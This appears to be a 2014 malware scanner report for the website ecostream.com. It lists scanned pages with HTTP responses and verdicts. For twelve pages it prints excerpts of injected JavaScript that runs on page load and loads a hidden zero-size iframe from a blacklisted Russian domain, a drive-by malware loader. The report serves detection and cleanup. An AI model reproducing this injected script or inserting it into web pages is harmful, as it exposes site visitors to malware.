Malware Scanner report for ecostream.com

Malicious/Suspicious/Total urls checked: 9/3/17

12 pages have malicious or suspicious code. See details below

Blacklists: Found

The website is marked by Yandex as suspicious.

The website "ecostream.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ecostream.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://ecostream.com/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://ecostream.com/	HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 23 May 2014 01:54:39 GMT Location: http://www.ecostream.com/ Server: Apache/2.2.9 Vary: Accept-Encoding Content-Length: 233 Content-Type: text/html; charset=iso-8859-1	clean
http://www.ecostream.com/	200 OK Content-Length: 8882 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: nvdrabs.ru ...[308 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function tacgmlz(){ create_frame("http://nvdrabs.ru/rjnemzv.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', tacgmlz); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); tacgmlz(); }; window.onload = newonload; } else { window.onload = tacgmlz; } } } catch(err) {} Decoded script: function tacgmlz() { create_frame("http://nvdrabs.ru/rjnemzv.cgi?default"); }
http://www.ecostream.com/media/system/js/caption.js	200 OK Content-Length: 1963 Content-Type: application/javascript	clean
http://ecostream.com/about-ecostream/about-ecostream/about-us	HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 23 May 2014 01:54:41 GMT Location: http://www.ecostream.com/about-ecostream/about-ecostream/about-us Server: Apache/2.2.9 Vary: Accept-Encoding Content-Length: 273 Content-Type: text/html; charset=iso-8859-1	clean
http://www.ecostream.com/about-ecostream/about-ecostream/about-us	200 OK Content-Length: 9017 Content-Type: text/html	suspicious
Page code contains blacklisted domain: nvdrabs.ru ...[10395 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function 3zss4zt(){ create_frame("http://nvdrabs.ru/uvkkivr.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', 3zss4zt); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); 3zss4zt(); }; window.onload = newonload; } else { window.onload = 3zss4zt; } ...[54 bytes skipped]...
http://www.ecostream.com/about-ecostream/products	200 OK Content-Length: 8154 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: nvdrabs.ru ...[308 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function ww2ooa5(){ create_frame("http://nvdrabs.ru/ssyggjo.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', ww2ooa5); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); ww2ooa5(); }; window.onload = newonload; } else { window.onload = ww2ooa5; } } } catch(err) {} Decoded script: function ww2ooa5() { create_frame("http://nvdrabs.ru/ssyggjo.cgi?default"); }
http://www.ecostream.com/about-ecostream/projects	200 OK Content-Length: 8925 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: nvdrabs.ru ...[308 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function cxgndob(){ create_frame("http://nvdrabs.ru/nbeqlgw.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', cxgndob); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); cxgndob(); }; window.onload = newonload; } else { window.onload = cxgndob; } } } catch(err) {} Decoded script: function cxgndob() { create_frame("http://nvdrabs.ru/nbeqlgw.cgi?default"); }
http://www.ecostream.com/about-ecostream/newsamedia	200 OK Content-Length: 10061 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: nvdrabs.ru ...[304 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function bo1l25l(){ create_frame("http://nvdrabs.ru/wgtzyoz.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', bo1l25l); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); bo1l25l(); }; window.onload = newonload; } else { window.onload = bo1l25l; } } } catch(err) {} Decoded script: function bo1l25l() { create_frame("http://nvdrabs.ru/wgtzyoz.cgi?default"); }
http://www.ecostream.com/contact-	200 OK Content-Length: 10424 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: nvdrabs.ru ...[310 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function cdne4az(){ create_frame("http://nvdrabs.ru/nlqdijv.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', cdne4az); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); cdne4az(); }; window.onload = newonload; } else { window.onload = cdne4az; } } } catch(err) {} Decoded script: function cdne4az() { create_frame("http://nvdrabs.ru/nlqdijv.cgi?default"); }
http://www.ecostream.com/media/system/js/validate.js	200 OK Content-Length: 4246 Content-Type: application/javascript	clean
http://www.ecostream.com/sitemap	200 OK Content-Length: 8346 Content-Type: text/html	suspicious
Page code contains blacklisted domain: nvdrabs.ru ...[9548 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function 4osmbje(){ create_frame("http://nvdrabs.ru/igkmwcd.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', 4osmbje); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); 4osmbje(); }; window.onload = newonload; } else { window.onload = 4osmbje; ...[55 bytes skipped]...
http://www.ecostream.com/about-ecostream/about-ecostream/vision-mission-a-strategy	200 OK Content-Length: 9042 Content-Type: text/html	suspicious
Page code contains blacklisted domain: nvdrabs.ru ...[10298 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function 4k5qc1x(){ create_frame("http://nvdrabs.ru/ixoantb.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', 4k5qc1x); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); 4k5qc1x(); }; window.onload = newonload; } else { window.onload = 4k5qc1x; } ...[54 bytes skipped]...
http://www.ecostream.com/about-ecostream/home	200 OK Content-Length: 8900 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: nvdrabs.ru ...[306 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function oeggwbj(){ create_frame("http://nvdrabs.ru/gdeeswc.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', oeggwbj); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); oeggwbj(); }; window.onload = newonload; } else { window.onload = oeggwbj; } } } catch(err) {} Decoded script: function oeggwbj() { create_frame("http://nvdrabs.ru/gdeeswc.cgi?default"); }
http://www.ecostream.com/test404page.js	404 Not Found Content-Length: 212 Content-Type: text/html	clean
http://www.ecostream.com/about-ecostream/about-ecostream/countries	200 OK Content-Length: 8628 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: nvdrabs.ru ...[310 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function ieeai2a(){ create_frame("http://nvdrabs.ru/hddjhyj.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', ieeai2a); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); ieeai2a(); }; window.onload = newonload; } else { window.onload = ieeai2a; } } } catch(err) {} Decoded script: function ieeai2a() { create_frame("http://nvdrabs.ru/hddjhyj.cgi?default"); }
http://www.ecostream.com/about-ecostream/products/our-solar-partners	200 OK Content-Length: 7984 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: nvdrabs.ru ...[308 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function lidtblz(){ create_frame("http://nvdrabs.ru/zhlrwzv.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', lidtblz); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); lidtblz(); }; window.onload = newonload; } else { window.onload = lidtblz; } } } catch(err) {} Decoded script: function lidtblz() { create_frame("http://nvdrabs.ru/zhlrwzv.cgi?default"); }
http://www.ecostream.com/about-ecostream/products/solar-faq	200 OK Content-Length: 30611 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: nvdrabs.ru ...[304 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function bb4eeib(){ create_frame("http://nvdrabs.ru/wwiddhw.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', bb4eeib); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); bb4eeib(); }; window.onload = newonload; } else { window.onload = bb4eeib; } } } catch(err) {} Decoded script: function bb4eeib() { create_frame("http://nvdrabs.ru/wwiddhw.cgi?default"); }

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ecostream.com

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 23 May 2014 01:54:39 GMT
Location: http://www.ecostream.com/
Server: Apache/2.2.9
Vary: Accept-Encoding
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1

...233 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: ecostream.com
Referer: http://www.google.com/search?q=ecostream.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for ecostream.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools